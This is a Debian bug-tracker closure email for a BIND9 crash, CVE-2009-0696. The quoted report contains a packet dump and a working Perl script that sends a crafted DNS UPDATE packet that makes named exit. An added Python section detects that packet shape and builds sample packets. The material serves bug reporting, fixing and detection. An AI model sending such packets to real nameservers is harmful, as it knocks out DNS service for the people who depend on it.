Your message dated Sun, 02 Aug 2009 20:28:31 +0000
with message-id <e1mxhft-0003pu...@ries.debian.org>
and subject line Bug#538975: fixed in bind9 1:9.5.1.dfsg.P3-1
has caused the Debian Bug report #538975,
regarding bind9 dies with assertion failure (db.c:579)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
538975: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=538975
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: bind9
Severity: normal


bind can be crashed with an update packet:

Packet in tcpdump:

15:38:11.676045 IP (tos 0x0, ttl  64, id 0, offset 0, flags [DF], proto: UDP (17), length: 178) 10.2.0.205.59447 > 10.2.0.205.53:  17378 update [1a] [1n] [1au] SOA? 8.0.10.in-addr.arpa. 8.8.0.10.in-addr.arpa. ANY ns: [|domain]

Another view of the Packet:

| ;; HEADER SECTION
| ;; id = 181
| ;; qr = 0    opcode = UPDATE    rcode = NOERROR
| ;; zocount = 1  prcount = 1  upcount = 1  adcount = 1
|
| ;; ZONE SECTION (1 record)
| ;; 8.0.10.in-addr.arpa.       IN      SOA
|
| ;; PREREQUISITE SECTION (1 record)
| 4.8.0.10.in-addr.arpa.        0       IN      ANY     ; no data
|
| ;; UPDATE SECTION (1 record)
| 4.8.0.10.in-addr.arpa.        0       ANY     ANY     ; no data
|
| ;; ADDITIONAL SECTION (1 record)
| office.example.com.        0       ANY     TSIG    HMAC-MD5.SIG-ALG.REG.INT. NOERROR


Such a packet can be created with perl:

-----------------

#!/usr/bin/perl -w

use Net::DNS;

our $NSI = '<dns server>';
our $NSI_KEY_NAME = '<key name>';
our $NSI_KEY = '<key>';


my $rzone = '<zone>';
my $rptr  = "1.$rzone";

my $packet = Net::DNS::Update->new($rzone);

$packet->push(
    pre => Net::DNS::RR->new(
        Name  => $rptr,
        Class => 'IN',
        Type  => 'ANY',
        TTL   => 0,
    )
);
$packet->push(
    update => Net::DNS::RR->new(
        Name  => $rptr,
        Class => 'ANY',
        Type  => 'ANY',
    )
);

$packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;


print $packet->string;

Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);

--------------------


bind only crashes if the FQDN used exists on the nameserver.


-- System Information:
Debian Release: 5.0.2
  APT prefers proposed-updates
  APT policy: (500, 'proposed-updates'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-xen-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash



--- End Message ---
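
The following Python is an added example, not part of the original bug report or of BIND: it parses a raw DNS message and flags the shape shown in the report's packet dump, an UPDATE whose prerequisite section carries a type ANY record in a concrete class such as IN. The function names and the sample bytes are constructed for illustration; class ANY and class NONE prerequisites of type ANY are the ordinary RFC 2136 "name is in use" and "name is not in use" forms and are not flagged.

```python
import struct

OPCODE_UPDATE, TYPE_ANY, CLASS_NONE, CLASS_ANY = 5, 255, 254, 255

def skip_name(msg, off):
    """Return the offset just past the (possibly compressed) name at off."""
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:      # compression pointer: 2 bytes, ends the name
            return off + 2
        off += 1 + length
        if length == 0:                # root label ends the name
            return off

def suspicious_prereqs(msg):
    """Return (type, class) of prerequisite RRs with type ANY in a concrete class."""
    _id, flags, zocount, prcount, _up, _ad = struct.unpack_from("!6H", msg, 0)
    if (flags >> 11) & 0xF != OPCODE_UPDATE:
        return []
    off = 12
    for _ in range(zocount):           # zone entries: name, type, class
        off = skip_name(msg, off) + 4
    hits = []
    for _ in range(prcount):           # RRs: name, type, class, ttl, rdlength, rdata
        off = skip_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
        off += 10 + rdlen
        if rtype == TYPE_ANY and rclass not in (CLASS_ANY, CLASS_NONE):
            hits.append((rtype, rclass))
    return hits

def is_crafted_update(msg):
    """True if msg matches the reported shape; truncated input is not flagged."""
    try:
        return bool(suspicious_prereqs(msg))
    except (struct.error, IndexError):
        return False

def encode_name(name):
    """Encode a non-root domain name as uncompressed DNS labels."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"

def build_update(zone, prereq_name, prereq_class):
    """Constructed sample: UPDATE with one zone entry and one type ANY prerequisite."""
    header = struct.pack("!6H", 181, OPCODE_UPDATE << 11, 1, 1, 0, 0)
    zone_rr = encode_name(zone) + struct.pack("!HH", 6, 1)   # SOA, IN
    prereq = encode_name(prereq_name) + struct.pack("!HHIH", TYPE_ANY, prereq_class, 0, 0)
    return header + zone_rr + prereq
```
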
--- Begin Message ---
Source: bind9
Source-Version: 1:9.5.1.dfsg.P3-1

We believe that the bug you reported is fixed in the latest version of
bind9, which is due to be installed in the Debian FTP archive:

bind9-doc_9.5.1.dfsg.P3-1_all.deb
  to pool/main/b/bind9/bind9-doc_9.5.1.dfsg.P3-1_all.deb
bind9-host_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/bind9-host_9.5.1.dfsg.P3-1_amd64.deb
bind9_9.5.1.dfsg.P3-1.diff.gz
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1.diff.gz
bind9_9.5.1.dfsg.P3-1.dsc
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1.dsc
bind9_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1_amd64.deb
bind9_9.5.1.dfsg.P3.orig.tar.gz
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3.orig.tar.gz
bind9utils_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/bind9utils_9.5.1.dfsg.P3-1_amd64.deb
dnsutils_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/dnsutils_9.5.1.dfsg.P3-1_amd64.deb
libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
libdns45_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libdns45_9.5.1.dfsg.P3-1_amd64.deb
libisc45_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libisc45_9.5.1.dfsg.P3-1_amd64.deb
libisccc40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libisccc40_9.5.1.dfsg.P3-1_amd64.deb
libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
liblwres40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/liblwres40_9.5.1.dfsg.P3-1_amd64.deb
lwresd_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/lwresd_9.5.1.dfsg.P3-1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 538...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
LaMont Jones <lam...@debian.org> (supplier of updated bind9 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Tue, 28 Jul 2009 22:48:28 -0600
Source: bind9
Binary: bind9 bind9utils bind9-doc bind9-host libbind-dev libbind9-40 libdns45 libisc45 liblwres40 libisccc40 libisccfg40 dnsutils lwresd
Architecture: all amd64 source 
Version: 1:9.5.1.dfsg.P3-1
Distribution: stable-security
Urgency: low
Maintainer: LaMont Jones <lam...@debian.org>
Changed-By: LaMont Jones <lam...@debian.org>
Description: 
 bind9      - Internet Domain Name Server
 bind9-doc  - Documentation for BIND
 bind9-host - Version of 'host' bundled with BIND 9.X
 bind9utils - Utilities for BIND
 dnsutils   - Clients provided with BIND
 libbind-dev - Static Libraries and Headers used by BIND
 libbind9-40 - BIND9 Shared Library used by BIND
 libdns45   - DNS Shared Library used by BIND
 libisc45   - ISC Shared Library used by BIND
 libisccc40 - Command Channel Library used by BIND
 libisccfg40 - Config File Handling Library used by BIND
 liblwres40 - Lightweight Resolver Library used by BIND
 lwresd     - Lightweight Resolver Daemon
Closes: 538975
Changes: 
 bind9 (1:9.5.1.dfsg.P3-1) stable-security; urgency=low
 .
   [Internet Software Consortium, Inc]
 .
   * A specially crafted update packet will cause named to exit.
     CVE-2009-0696, CERT VU#725188.  Closes: #538975

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFKb+DbzN/kmwoKyScRAtLaAJ4tTc8UsPadqLdtMwcWFuKJa4T2dQCfQ9OX
0gCyOrrhUy9K5OoHTAqIScM=
=9vlB
-----END PGP SIGNATURE-----



--- End Message ---
